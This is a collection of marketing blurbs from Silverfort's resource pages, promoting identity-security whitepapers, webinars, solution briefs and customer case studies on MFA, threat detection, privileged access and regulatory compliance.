This guide is your essential resource for securing every identity across your organization’s expanding digital landscape. You’ll find practical insights and a 5-Step action plan for achieving a sustainable, effective identity security strategy. Plus, you'll learn:
- How identity security has evolved with more advanced identity threats, increasing complexity in hybrid enterprise environments, and the explosion of non-human identities to manage.
- Why the traditional IAM methods fall short, including PAM, ITDR, ISPM, MFA and more.
- What the 5 key requirements are for taking the IDEAL approach to modern identity security, so your organization can get ahead of both attackers and auditors.

Whether you’re part of an identity team managing access or a security team mitigating risk, this guide will help you align your strategies, ensuring both attackers and auditors never catch you off guard.

---
- Published: 2025-02-19
- Modified: 2025-03-28
- URL: https://www.silverfort.com/resources/identity-threat-detection-response-with-silverfort/

Protect Your Organization from Identity Threats

Identity-based attacks are on the rise, targeting credentials, privileges, and access pathways. Silverfort’s Identity Threat Detection and Response (ITDR) solution helps security teams detect, prevent, and respond to these threats in real time. By continuously monitoring authentication and access attempts across all on-prem and cloud environments, Silverfort provides proactive threat defense and seamless integration with SIEM, SOAR, and XDR platforms for faster incident response.

Download the solution brief to learn:
- How Silverfort monitors authentication patterns for unparalleled threat detection across all hybrid environments.
- Why identity-first security accelerates response to credential theft, privilege escalation, and lateral movement.
- How Silverfort integrates with your existing security stack to automate identity threat protection.

Get the full details—download now and stay ahead of identity-based attacks.

---
- Published: 2025-01-23
- Modified: 2025-04-16
- URL: https://www.silverfort.com/resources/beyond-the-perimeter-addressing-blind-spots-in-identity-security-for-2025-and-beyond/

As the security attack landscape continues to evolve, identity security has emerged as the next critical frontier.
With an anticipated surge in identity-related threats as we move into 2025, organizations can no longer afford to overlook the security risks tied to user identities, access controls, and digital credentials. In this webinar, Silverfort CEO and Co-Founder, Hed Kovetz, dives deep into the different blind spots in identity security and explores why it’s becoming a top priority for security leaders worldwide.

Topics covered include:
- The market challenges of 2024 that are setting the stage for identity security’s rapid growth in importance.
- How major players in the identity space are pivoting their strategies, including the role of mergers and acquisitions in shaping the future.
- Key steps every industry must take now to avoid carrying today’s security gaps into the new year.
- The alarming rise of deepfakes and adversarial AI, which are fueling sophisticated phishing and credential-based attacks - and how the C-Suite can proactively respond to these threats.
- And more

Whether you’re a security professional, IT leader, or C-Suite executive, this webinar shares invaluable insights into the identity security landscape, so you come away empowered to tackle the challenges and threats of 2025.

---
- Published: 2025-01-23
- Modified: 2025-02-27
- URL: https://www.silverfort.com/resources/us-insurance-provider-enhances-identity-security-posture-with-authentication-firewall/

When a trusted insurance provider sought to power up their identity security posture, they came to Silverfort. Led by their CISO's proactive approach to cybersecurity, the company knew they needed:
- Complete on-prem MFA protection
- Full visibility into their service accounts
- Strict security controls for all users, especially privileged accounts.

After a successful POC, the company realized the Silverfort platform was the ideal solution for their identity security needs.
The deployment took less than one month, during which they enrolled 425 employees, configured 36 service accounts, and set an authentication firewall to deny access unless explicitly allowed. Download this case study to discover how Silverfort strengthened this US insurance provider's identity security posture.

---
- Published: 2025-01-15
- Modified: 2025-03-28
- URL: https://www.silverfort.com/resources/universal-multi-factor-authentication-mfa-with-silverfort/

Enhance Your Security with Universal MFA

In today's evolving threat landscape, securing all access points is crucial. Silverfort's Universal Multi-Factor Authentication (MFA) extends robust protection across your entire enterprise, including resources previously deemed unprotectable. By integrating seamlessly with your existing infrastructure, Silverfort enables MFA enforcement without requiring modifications to individual systems.

Download the solution brief to discover:
- How to implement MFA across all resources, including legacy systems, homegrown applications, and IT infrastructure.
- Strategies to enhance security posture by unifying MFA policies across on-premises and cloud environments.
- Ways to integrate or replace your current MFA solution for broader coverage and simplified maintenance.

Strengthen your organization's defense against identity-based attacks. Download the solution brief now to learn more.

---
- Published: 2025-01-14
- Modified: 2025-02-21
- URL: https://www.silverfort.com/resources/ciso-perspective-why-great-companies-with-great-solutions-still-get-breached/

In today’s constantly shifting threat landscape, even the most well-prepared companies with the latest and greatest solutions can still fall victim to breaches. But why does this happen? In this webinar, Silverfort’s CISO, John Paul Cunningham, shares his wisdom as to why even great organizations can be exposed and what can be done to strengthen your defenses.
John Paul provides actionable insights and strategies for safeguarding your organization against modern threats and how to align these efforts with business goals. Other topics covered include:
- Key cyber security priorities and how to collaborate with your organization’s leadership team to execute them
- Common vulnerabilities that are often missed, even with advanced solutions
- How attackers bypass traditional security measures
- Tactics for addressing hidden risks and blind spots in your security architecture
- And more

---
- Published: 2025-01-09
- Modified: 2025-08-18
- URL: https://www.silverfort.com/resources/enhancing-microsofts-ability-to-protect-leaked-credentials-with-silverfort/

Compromised credentials are still the #1 way attackers break in. What if you could block their use—on every system, in real time? That’s exactly what Silverfort and Microsoft Entra ID make possible. This PDF explains how Silverfort enhances Microsoft’s leaked credential detection by enforcing immediate, context-aware Conditional Access policies—even for systems and authentications outside Entra ID. When Entra ID flags a credential leak, Silverfort can instantly block or challenge suspicious activity not just in the cloud, but across on-prem servers, legacy applications, and command-line interfaces—stopping lateral movement before it starts. By uniting Microsoft’s detection with Silverfort’s enforcement, organizations gain real-time protection where they need it most—across the full hybrid environment.

In this PDF, you’ll learn how to:
- Enforce MFA or block access for users with leaked credentials—across on-prem and cloud environments.
- Prevent lateral movement attacks by cutting off compromised accounts from reaching sensitive systems.
- Extend Conditional Access to systems like RDP, SSH, legacy apps, and infrastructure that Entra ID alone can’t protect.

Download the PDF now and learn how to shut down leaked credential attacks—no matter where they start.
---
- Published: 2024-12-16
- Modified: 2025-02-21
- URL: https://www.silverfort.com/resources/preventing-privilege-escalation-effective-pas-practices-for-todays-threat-landscape/

As privileged accounts continue to be one of the highest-risk targets for cyberattacks, managing them effectively is more critical than ever. But as you know, this is much easier said than done. Traditional PAM solutions are subject to inherent blind spots that prevent them from providing end-to-end security to all privileged users. Additionally, these solutions often struggle with lengthy and complex deployment cycles, reliance on manual account discovery, inability to enforce least privilege access and lack the capability to prevent admins from bypassing controls, leaving critical security gaps in place.

In this webinar, Ron Rasin, Chief Strategy Officer at Silverfort, dives into the fundamentals of privileged access security (PAS), exploring key strategies for discovering, classifying, and securing privileged accounts across various organizational tiers. Topics covered include:
- How to gain complete visibility into all your privileged accounts, which empowers you to reduce the attack surface
- How to monitor all privileged users’ activity and permissions
- How to implement and enforce least privilege and Just-in-Time (JIT) policies
- How to align PAS best practices with your organizational needs
- And more

---
- Published: 2024-12-09
- Modified: 2025-03-28
- URL: https://www.silverfort.com/resources/privileged-access-security-pas/

Discover, classify, and enforce least privilege and Just-In-Time (JIT) access policies for all your privileged users. With Silverfort's Privileged Access Security, you can:
- Automatically discover and classify all privileged accounts to different tiers based on the actual privileges they use.
- Enforce seamless Just-In-Time access on domain privileged accounts with a single click.
- Apply least privilege policies with virtual fencing.
- Eliminate your dependency on vaulting and password rotation.

Get the solution brief to learn more.

---
- Published: 2024-11-25
- Modified: 2025-02-21
- URL: https://www.silverfort.com/resources/beyond-the-endpoint-a-deep-dive-into-using-identity-as-the-basis-for-incident-response/

Three-quarters of organizations face faster-moving cyber threats than ever, making rapid detection and response essential. Traditionally, response focused on endpoints, but with attackers increasingly leveraging legitimate credentials, a compromised endpoint is no longer the main concern. Misuse of credentials now drives lateral movement and data exfiltration, positioning identity as a critical indicator of compromise and a key to stopping attacks. In this webinar, we take a deeper look into identity’s use in cyberattacks and explore a number of related topics, including:
- The reliability of using the endpoint to detect attacks
- Why monitoring identity augments your layered security strategy
- Identity’s role in the post-compromise stage
- A look at the impact of shifting to using identity as the basis for IR efforts
- And more

In addition, our Silverfort experts demonstrate how identity can address lateral movement attacks, particularly in ransomware scenarios requiring domain dominance. This session includes a live demo on identity-based IR, featuring containment, investigation, attack path tracing, and controlled recovery.

---
- Published: 2024-11-11
- Modified: 2025-02-21
- URL: https://www.silverfort.com/resources/comply-with-new-york-state-department-of-healths-section-405-46-of-title-10-nycrr/

The New York State Department of Health (DOH)'s Title 10 NYCRR Section 405.46 requires healthcare facilities to implement strict cybersecurity measures, including data encryption, controlled access, and continuous electronic health records (EHR) monitoring.
This ensures that hospitals maintain rigorous standards for protecting sensitive patient data, reinforcing both patient privacy and healthcare system resilience against cyber threats. Key components of Section 405.46 include:
- A robust cybersecurity program
- The appointment of a Chief Information Security Officer (CISO)
- Regular Testing and Vulnerability Assessments
- Audit Trails and Records
- A detailed incident response plan
- Access control measures

Download this solution brief to discover how Silverfort makes compliance with Section 405.46 easy.

---
- Published: 2024-11-05
- Modified: 2025-02-21
- URL: https://www.silverfort.com/resources/how-to-comply-with-new-york-state-department-of-healths-section-405-46-of-title-10-nycrr-with-silverfort/

The New York State Department of Health (DOH) established 10 NYCRR 405.46 in 1999, initially to safeguard patient rights regarding restraints and seclusion in hospitals. Since then, it has evolved to address growing cybersecurity concerns in healthcare. The current version mandates that healthcare facilities implement strict cybersecurity protocols, such as data encryption, controlled access, and continuous electronic health record (EHR) monitoring. These updates aim to protect patient privacy and secure the healthcare system against cyber threats.

In October 2024, the DOH introduced further updates to 10 NYCRR 405.46, strengthening the regulation's cybersecurity mandates across New York’s 195 general hospitals. These new rules require hospitals to fully comply by October 2025, though they must report cybersecurity incidents within 72 hours as of October 2024. The regulation is focused on protecting sensitive patient health information (PHI) and personally identifiable information (PII) from cyber threats. Key elements of the updated mandate include:
- Cybersecurity Program: A robust program covering monitoring, incident response, training, and policies is now required.
- Chief Information Security Officer (CISO): Each hospital must designate a CISO, either as an internal role or through a third party, to oversee cybersecurity.
- Access Control Measures: Hospitals must enforce multifactor authentication (MFA), manage privileged account access, and conduct annual access reviews.
- Testing and Vulnerability Assessments: Regular testing, including scans and penetration assessments, is required to manage cybersecurity risks.
- Audit Trails and Records: Hospitals must maintain audit trails to detect and respond to cyber incidents and securely retain records.
- Incident Response: A detailed response plan is mandatory, with incident reporting to the Department of Health within 72 hours.

Silverfort, a unified identity security platform, assists hospitals with these new requirements through cost-effective, healthcare-focused solutions. By offering tools for MFA, privileged access security, and continuous threat monitoring, Silverfort helps hospitals comply with reporting and identity security standards efficiently.

Download the full whitepaper to discover:
- In-depth Compliance Insights: Detailed guidance on meeting each specific requirement of New York's 10 NYCRR 405.46.
- Practical Solutions for Implementation: Learn how Silverfort's platform simplifies MFA and access security, customized for healthcare needs.
- Future-Ready Security Strategies: Gain insights into how to adapt identity security practices to safeguard against evolving cyber threats.

---
- Published: 2024-10-16
- Modified: 2025-07-01
- URL: https://www.silverfort.com/resources/how-to-comply-with-cmmcs-identity-security-requirements-with-silverfort/

The Cybersecurity Maturity Model Certification (CMMC) was established by the U.S. Department of Defense to bolster security in the Defense Industrial Base (DIB) sector by protecting sensitive unclassified data.
CMMC compliance is mandatory for all organizations involved with the DoD, ensuring they meet various levels of security requirements based on their role and the sensitivity of the data they handle. Achieving CMMC certification is crucial for DIB entities to protect critical systems and demonstrate their commitment to cybersecurity. With an emphasis on identity security, CMMC requires robust authentication measures, including Multi-Factor Authentication (MFA), to safeguard sensitive data. It also mandates strict access controls, enforcing the principle of least privilege to restrict access based on necessity. Organizations are expected to continuously monitor, log, and audit user activities to proactively detect and respond to potential threats.

Silverfort enables DIB organizations to meet these requirements quickly and easily. By integrating seamlessly with existing Identity and Access Management (IAM) systems, Silverfort offers comprehensive tools such as advanced MFA, Identity Security Posture Management (ISPM), and Identity Threat Detection and Response (ITDR). Silverfort extends MFA capabilities to legacy systems and unprotected resources, implements strong access controls, and continuously monitors access requests to detect and prevent unauthorized access in real time. Download our full whitepaper to explore how Silverfort supports your journey to CMMC compliance.

---
- Published: 2024-10-14
- Modified: 2025-07-21
- URL: https://www.silverfort.com/resources/silverfort-and-token2-integration/

FIDO2 tokens are a powerful defense—but what if you could use them to protect everything? This PDF explores how Silverfort and Token2 join forces to bring adaptive, hardware-backed MFA to every access point in your hybrid environment—no exceptions.
Whether it's legacy applications, PowerShell tools, file shares, or desktop logins, the Silverfort + Token2 integration enables you to apply Token2’s Pin+ Series FIDO2 tokens everywhere, without modifying apps or deploying agents. Silverfort performs real-time access risk analysis across on-prem and cloud resources. When suspicious activity is detected, it triggers a Token2 MFA challenge, ensuring the right people get access—and attackers don’t. The result? Stronger Zero Trust, seamless authentication, and no more unnecessary MFA prompts.

In this PDF, you’ll learn how to:
- Extend Token2 FIDO2 MFA to legacy, cloud, and on-prem systems that previously couldn’t be protected.
- Enforce adaptive MFA based on contextual risk to reduce friction and boost security.
- Unify the user experience with a consistent, risk-aware MFA process across your entire environment.

Download the PDF now to discover how Silverfort and Token2 make secure, risk-based, hardware-backed authentication a reality for every system in your enterprise.

---
- Published: 2024-10-08
- Modified: 2025-02-26
- URL: https://www.silverfort.com/resources/silverfort-identity-security-for-nist-sp-800-171/

NIST Special Publication 800-171, published in 2015 by the National Institute of Standards and Technology (NIST), offers a comprehensive framework for safeguarding Controlled Unclassified Information (CUI) in non-federal systems. It primarily targets federal contractors, subcontractors, and other non-federal organizations that store or process CUI on behalf of the U.S. government. CUI encompasses sensitive but unclassified information in areas such as defense and healthcare, and protecting it is crucial for national security. NIST SP 800-171 highlights identity security as a critical component in protecting CUI, recognizing the shift in cyberattacks towards exploiting compromised credentials and weak access controls.
Key requirements include implementing multi-factor authentication (MFA), conducting regular user account audits, and enforcing the principle of least privilege to limit access to sensitive data.

The Silverfort Unified Identity Security Platform complements NIST SP 800-171 by enhancing identity security across all Identity and Access Management (IAM) systems within an organization. It provides tools such as advanced MFA, Identity Security Posture Management (ISPM), and Identity Threat Detection and Response (ITDR). Silverfort extends MFA to previously unprotected resources, applies strong access controls, continuously monitors for anomalies, and actively detects and blocks identity-based threats. These capabilities help organizations comply with NIST SP 800-171 by strengthening identity security and reducing the risk of unauthorized access to CUI. Download our white paper to discover the full details of how Silverfort makes complying with NIST SP 800-171 easy.

---
- Published: 2024-10-04
- Modified: 2025-02-26
- URL: https://www.silverfort.com/resources/from-breach-to-recovery-designing-an-identity-focused-incident-response-playbook/

Traditional incident response plans are no longer enough. Cybercriminals are relentlessly targeting identities, exploiting stolen credentials and weak access points to wreak havoc. While there's a well-trodden path for handling malware and network breaches, the identity piece of the puzzle is often missing. Organizations lack the clear procedures to quickly identify compromised accounts and stop attackers from spreading like wildfire. That's where a robust Identity Incident Response (IR) Playbook comes in. It's the essential tool for fortifying your defenses and protecting your organization's most valuable assets.
In this webinar, you'll discover:
- Why identity is the new frontline in the cyberwar
- The latest tactics attackers use to compromise accounts
- Proven strategies for rapid detection and containment
- How to create an Identity IR Playbook tailored to your organization
- And much more!

Whether you're starting from scratch or looking to level up your existing incident response, this webinar will give you the knowledge and actionable steps to safeguard your identities against today's most pressing threats.

---
- Published: 2024-10-01
- Modified: 2025-02-27
- URL: https://www.silverfort.com/resources/silverfort-smart-policy-for-service-accounts/

Scale service account protection in bulk with behavior-based policies that never interfere with service operations. With Silverfort's Smart Policy, customers can automatically create policies for groups of service accounts without disrupting critical services. Save the time and labor of creating policies one-by-one, monitoring for policy deviations and manually enforcing deny policies with this simple solution. Discover Silverfort's smart policies for service accounts by downloading this solution brief.

---
- Published: 2024-09-25
- Modified: 2025-08-14
- URL: https://www.silverfort.com/resources/identity-has-become-the-prime-target-of-threat-actors-silverfort-aig/

As the frequency and sophistication of ransomware attacks escalate, identity has emerged as the primary target for cybercriminals. With over 83% of organizations reporting breaches involving compromised credentials, attackers are exploiting security gaps in identity and access management (IAM) strategies, especially where multi-factor authentication (MFA) is either misconfigured or not covered. Despite the critical role of MFA in bolstering security, many organizations continue to face significant challenges in achieving full MFA coverage, leaving them vulnerable to identity-based attacks.
This white paper highlights the growing threat to identity, detailing the limitations of traditional MFA implementations, especially in securing on-premises and legacy systems. Attackers often exploit these gaps to gain unauthorized access, escalate privileges, and deploy ransomware. Administrative and service accounts, which typically have broad access across networks, are particularly vulnerable to compromise when they are left without robust MFA protection. You will learn the common challenges organizations face in implementing MFA, such as difficulties with legacy systems and the use of outdated authentication protocols. MFA should be approached from a unified, comprehensive perspective, emphasizing that any gaps in protection, especially for privileged accounts, may result in devastating security breaches.

Key Findings:
- Identity Threats on the Rise: Over 83% of breaches involve compromised credentials, with attackers exploiting MFA misconfigurations and coverage gaps.
- MFA Shortcomings: Traditional MFA methods often fail to protect critical on-premises systems, service accounts, and administrative users, creating significant vulnerabilities.
- Unified MFA Solution: A comprehensive, protocol-agnostic MFA solution is necessary to ensure full coverage across all resources, from cloud-based applications to legacy on-premises infrastructure.

To protect all user access, including privileged accounts, organizations are encouraged to reassess their MFA implementations and adopt strategies that provide full protection. Get the whitepaper today to start your journey.

---
- Published: 2024-09-24
- Modified: 2025-07-01
- URL: https://www.silverfort.com/resources/silverforts-okta-bridge/

Bring Okta’s web SSO flows to your on-prem world for real-time protection against identity-based attacks. Think Okta’s identity controls are just for cloud apps? Think again.
With Silverfort’s Okta Bridge, you can extend Okta’s Adaptive Authentication and MFA to every part of your hybrid environment, including legacy apps, command-line tools, and on-prem servers. No custom integrations. No rip-and-replace. Just seamless, secure access control everywhere. This solution brief shows you exactly how the Silverfort-Okta integration works, what problems it solves, and how it lets you treat your on-prem systems like modern SaaS apps in Okta, complete with policy enforcement, visibility, and strong authentication. Whether you’re modernizing your IAM strategy or just want to reduce identity risk without the heavy lift, this guide gives you the roadmap.

In this PDF, you’ll learn how to:
- Bridge legacy and modern systems by integrating on-prem apps into Okta’s web SSO flows. No rewrites required.
- Apply Okta policies and MFA to any resource, enabling consistent security across cloud, on-prem, and multi-cloud environments.
- Prevent identity threats like lateral movement attacks with inline, risk-aware access decisions.

---
- Published: 2024-09-24
- Modified: 2025-07-01
- URL: https://www.silverfort.com/resources/silverforts-pingfederate-bridge/

Extend PingFederate web SSO flows to every corner of your environment

What if you could apply PingFederate’s robust access policies and MFA to your on-prem resources, without ripping and replacing legacy infrastructure? With Silverfort’s PingFederate Bridge, you can. This solution brief shows how Silverfort seamlessly extends PingFederate’s identity security controls to traditionally “unprotectable” resources, like legacy apps, command-line tools, and IT infrastructure. By bridging these systems into PingFederate, you unify policy enforcement, gain full visibility into authentication activity, and protect against advanced identity threats like lateral movement—without disrupting users or operations.
This guide breaks it all down clearly, including how the bridging process works step-by-step, what you gain from it, and why this joint solution is a game-changer for hybrid identity security.

In this PDF, you’ll learn how to:
- Bridge the gap between legacy on-prem systems and modern identity security with PingFederate SSO flows.
- Unify policy enforcement across cloud and on-prem environments, without changing the user experience.
- Stop advanced attacks like lateral movement with inline risk-based access decisions and PingID MFA.

---
- Published: 2024-09-24
- Modified: 2025-07-01
- URL: https://www.silverfort.com/resources/meeting-the-identity-security-requirements-of-the-cjis-security-policy-with-silverfort/

CJIS compliance is a set of minimum requirements for accessing and handling Criminal Justice Information (CJI), which is any information that cannot be publicly disclosed except under certain circumstances, like by court order or when necessary for public safety. In particular, it refers to Federal Bureau of Investigation (FBI) data such as biometrics, biographics, case records, and other identifiable information about individuals, vehicles, or properties related to criminal activity. Organizations that handle CJI are required to comply with the CJIS Security Policy as soon as they begin accessing, storing, or transmitting this data.

Addressing the Identity Security Aspects of CJIS

CJIS addresses identity security concerns by requiring strong authentication mechanisms, including multi-factor authentication (MFA), to ensure that only authorized individuals can access CJI. This proactive approach to identity security significantly reduces the risk of unauthorized access, even if one factor is compromised. Additionally, the CJIS policy mandates strict management of privileged accounts in line with the principle of least privilege and requires regular auditing and monitoring to detect any unauthorized activities.
Continuous monitoring and detailed logging of user activities are also vital components of CJIS compliance. Organizations must track who accesses CJI and when, so identifying and responding to suspicious actions can occur quickly and easily.

Download this whitepaper to discover:
- The key CJIS identity security requirements
- How Silverfort's capabilities map to CJIS
- How to comply quickly and easily with CJIS

---
- Published: 2024-08-19
- Modified: 2025-02-26
- URL: https://www.silverfort.com/resources/re-evaluate-your-mfa-protection-ppc/

MFA protection in AD environments is ultimately only as strong as its weakest link. Without an MFA deployment that covers all organizational resources, these weak links will persist, potentially exposing your organization to risk.

Download this eBook to learn:
- Why traditional MFA solutions can’t protect PsExec and PowerShell access.
- How you can assess your existing MFA protection to better understand your risk exposure.
- How you can gain end-to-end MFA coverage for all NTLM and Kerberos authentication in your AD environment.

---
- Published: 2024-08-19
- Modified: 2025-02-26
- URL: https://www.silverfort.com/resources/overcoming-the-security-blind-spots-of-service-accounts-ppc/

Within the challenge of Active Directory protection, service accounts have emerged as a pressing concern for identity and security stakeholders. With their inherent lack of visibility, elevated access privileges and exemption from identity protection measures like PAM and MFA, service accounts are a perilous blind spot – and a veritable goldmine for attackers.

Download this eBook to learn:
- Why automating the discovery of service accounts is a must-have.
- How learning the behavior of each service account is the first step towards real-time protection.
How to prevent adversaries from using compromised service accounts for malicious access. --- - Published: 2024-08-19 - Modified: 2025-02-26 - URL: https://www.silverfort.com/resources/solving-the-top-five-pam-challenges-of-identity-teams-ppc/ Learn how Silverfort’s Azure AD bridging capability extends Azure AD MFA and Conditional Access to all on-prem resources while configuring all access policies from Azure AD. PAM solutions aim to address the challenge of protecting privileged accounts, both admin users and service accounts, from compromise. However, there are critical admin user discovery and protection challenges that must be overcome to successfully complete the PAM onboarding journey. Download this eBook to learn: Why only protecting the admins you know about leaves critical users exposed to compromise. What special visibility and protection challenges service accounts introduce to PAM solutions. How a Unified Identity Security platform can accelerate the PAM journey and cover its blind spots. --- - Published: 2024-08-15 - Modified: 2025-02-26 - URL: https://www.silverfort.com/resources/why-identity-security-is-a-necessity/ Identity security has become a top priority for all organizations. Traditional identity controls do not provide complete coverage, leaving critical resources exposed to malicious access and to attacks that use compromised credentials, such as lateral movement or ransomware. Without a proactive approach to identity security, you will always be one step behind malicious actors. Download this solution brief to discover the key foundations of identity security. --- - Published: 2024-08-12 - Modified: 2025-02-26 - URL: https://www.silverfort.com/resources/safe-and-impact-free-usage-of-silverfort-on-your-domain-controllers/ Ensuring your Active Directory Domain Controllers are secure and stable is more critical than ever. Silverfort understands the delicate balance between enhancing security and maintaining system stability.
Our solution is designed with this balance in mind, ensuring that you can bolster your security posture without compromising the performance or reliability of your domain controllers. Download this solution brief to discover how Silverfort operates seamlessly without causing any disruption to your systems. --- - Published: 2024-08-07 - Modified: 2025-02-22 - URL: https://www.silverfort.com/resources/data3-and-silverfort-implementing-world-leading-identity-protection-with-the-southport-school/ Discover how Silverfort and Data#3, a leading cloud solutions and ICT service provider in Australia, are working together to bring best-in-class identity protection to The Southport School. https://www.youtube.com/watch?v=zD6ewfsaf8Q --- - Published: 2024-08-07 - Modified: 2025-02-26 - URL: https://www.silverfort.com/resources/why-silverfort/ Traditional identity controls fall short of providing complete coverage, leaving critical resources exposed to malicious access. With Silverfort, organizations can solve the critical identity security risks they’ve been struggling with for years, because we go where identity security has never gone before. Download this solution brief to understand what Silverfort does and why it’s an essential identity security tool. --- - Published: 2024-07-23 - Modified: 2025-02-27 - URL: https://www.silverfort.com/resources/silverfort-for-microsoft-sentinel-and-security-copilot/ Traditional IAM solutions often lack the depth needed to detect ongoing malicious activity, particularly identity-based attacks. Silverfort bridges this gap by integrating with Microsoft Sentinel, providing granular, analyzed identity security data. This integration streamlines the investigation and response process for security analysts, enhancing their ability to mitigate threats quickly and accurately. Download this solution brief to learn more about how Silverfort for Microsoft Sentinel works.
--- - Published: 2024-07-17 - Modified: 2025-06-23 - URL: https://www.silverfort.com/resources/silverfort-identity-security-for-the-nist-cybersecurity-framework-2-0/ Align with NIST CSF 2.0 and secure every identity with confidence The NIST Cybersecurity Framework 2.0 is here, and it’s raising the bar on how organizations assess, manage, and reduce cybersecurity risk. At the heart of this shift? Identity. If you're looking for a smarter, simpler way to address the identity-focused controls in NIST CSF 2.0, this guide is your roadmap. We'll break down exactly how Silverfort helps you align with five of the framework’s six core functions (Govern, Identify, Protect, Detect, and Respond) through identity security. From extending MFA to previously unprotectable systems to detecting lateral movement and risky authentications in real time, this whitepaper shows how Silverfort delivers the visibility, enforcement, and automation you need to meet NIST recommendations with confidence and control. In this whitepaper, you’ll learn how to: Strengthen identity posture across your entire IAM infrastructure with continuous monitoring, risk scoring, and adaptive access control. Map directly to NIST CSF 2.0 functions with detailed, control-by-control breakdowns, no guesswork required. Enforce zero trust principles like least privilege, MFA everywhere, and Just-In-Time access, without overhauling your existing environment. --- - Published: 2024-07-16 - Modified: 2025-02-27 - URL: https://www.silverfort.com/resources/gain-end-to-end-visibility-across-your-environment-with-silverfort/ Security starts with visibility. If you don’t have full visibility across your environments, you are essentially operating in the dark. Without clear insight into user and authentication activity, access permissions, risky identities, authorized applications, and the potential identity security risks in your organization, you cannot make informed decisions.
As a result, you could be leaving critical identity security gaps without even being aware of them. Download this solution brief to learn more about end-to-end visibility with Silverfort, including: Gaining complete visibility into all user activity and authentications Investigating potential risks quickly and efficiently Powering up your identity security posture management Monitoring your service accounts --- - Published: 2024-07-12 - Modified: 2025-02-26 - URL: https://www.silverfort.com/resources/webinar-top-5-evaluation-criteria-for-itdr-solutions/ In today’s digital landscape, identity threats are more prevalent than ever. Protecting your organization’s identities is crucial as lateral movement and ransomware attacks rise. The new category of Identity Threat Detection and Response (ITDR) has emerged to address these challenges, but selecting the right tool can be daunting. Hear from Yiftach Keshet, VP of Product Marketing at Silverfort, in this exclusive webinar where you’ll discover: Unique Challenges Only ITDR Can Solve: Discover why traditional solutions fall short and how ITDR bridges the gap. Critical ITDR Capabilities: Learn about the key features to look for in an ITDR solution to ensure robust identity protection. Real-Life Scenarios: Gain insights into how ITDR solutions effectively counteract identity threats in various situations. Key takeaways from this webinar: Understand the importance of identity protection in cybersecurity. Learn how to evaluate and choose the best ITDR solution for your needs. Get actionable insights from real-world examples. --- - Published: 2024-07-02 - Modified: 2025-05-22 - URL: https://www.silverfort.com/resources/london-borough-of-waltham-forest-and-silverfort-a-case-study/ Following ransomware attacks targeting a number of schools in the borough, the London Borough of Waltham Forest needed to strengthen its identity security posture.
This meant extending MFA protection to all Active Directory users and gaining full visibility of all user authentication flows. Waltham Forest also sought a solution that could be quickly procured and deployed. In this case study you’ll learn: How Waltham Forest implemented MFA protection for all privileged admin accounts. How they gained complete visibility into user authentication flows. How they were able to quickly and easily deploy and gain value from the Silverfort solution. --- - Published: 2024-07-02 - Modified: 2024-10-15 - URL: https://www.silverfort.com/resources/identity-threat-detection-and-response-itdr-protecting-the-exposed-attack-surface-thn-nf/ Identity threats that use compromised credentials for malicious access to targeted resources have become the chief concern for organizations’ security stakeholders. None of the existing security products can deliver real-time protection against these attacks, making account takeover, lateral movement and ransomware spread a critical, unaddressed risk. Identity Threat Detection and Response (ITDR) is the new category of products purpose-built to confront and defeat these attacks. Download this eBook to learn: What makes the identity attack surface exposed to attacks? What are the core capabilities of an ITDR solution? How to choose an ITDR solution that best fits your needs? --- - Published: 2024-07-01 - Modified: 2025-03-28 - URL: https://www.silverfort.com/resources/silverforts-authentication-firewall/ Strengthen Access Control with Silverfort's Authentication Firewall In today's dynamic threat landscape, enforcing granular access control is essential to protect your organization's resources. Silverfort's Authentication Firewall empowers you to govern user access based on identity, enabling real-time enforcement of least privilege policies without requiring infrastructure changes.
Download the solution brief to learn: How to implement dynamic access segmentation to control user interactions with critical resources effectively. Strategies for reducing your attack surface by blocking insecure protocols and addressing misconfigurations. Methods to contain active attacks by freezing access to sensitive areas upon breach detection. Enhance your security posture with proactive access control measures. Download the solution brief now to get started. --- - Published: 2024-07-01 - Modified: 2025-02-22 - URL: https://www.silverfort.com/resources/leading-gaming-company-extends-mfa-protection-to-core-legacy-applications-and-bridges-on-prem-resources-to-entra-id-with-silverfort/ A leading gaming company that develops immersive free-to-play social and mobile games sought to implement MFA protection across all users and resources in its environment to meet the PCI DSS compliance framework’s requirements. It also needed a solution to improve the visibility and protection of its service accounts. In this case study you’ll learn: How this leading gaming company extended MFA protection to all users and resources. How they gained full visibility and protection of all service accounts. How they complied with the PCI DSS framework’s MFA requirements quickly and easily. --- - Published: 2024-06-26 - Modified: 2025-07-21 - URL: https://www.silverfort.com/resources/silverfort-and-thales-fido2-integration/ FIDO2 hardware-backed authentication is the gold standard. But what if you could apply it to every system, no matter how old or complex? That’s exactly what this integration makes possible. In this quick-read PDF, you’ll discover how Silverfort and Thales combine to extend FIDO2 smart card and USB token protection to all your resources: cloud, on-prem, and even those long considered “unprotectable.
” Silverfort analyzes every access attempt in real time, determines risk, and, if necessary, triggers a FIDO2 challenge via Thales—ensuring bulletproof MFA is applied only when it matters. It works seamlessly across environments, without requiring agents, proxies, or changes to application code. If your security strategy depends on Zero Trust or high-assurance access, this is the integration you’ve been waiting for. In this PDF, you’ll learn how to: Extend Thales FIDO2 MFA to legacy systems, command-line tools, file shares, and more. Strengthen risk-based Zero Trust access with adaptive policy enforcement that won’t disrupt users. Meet regulatory requirements with FIDO2-, FIPS-, and Common Criteria-compliant authenticators. Download the PDF now to see how Silverfort and Thales deliver enterprise-grade security—everywhere it counts. --- - Published: 2024-06-23 - Modified: 2025-05-22 - URL: https://www.silverfort.com/resources/shannon-medical-center-and-silverfort-a-case-study/ As a prominent healthcare provider, Shannon Medical Center needed to increase its overall security posture. This meant applying MFA protection to its entire user base and gaining better visibility into its admin users’ activity as well as its overall IT infrastructure. Shannon Medical Center searched for an identity security solution that would meet all their security needs as well as the needs of their healthcare environment. 
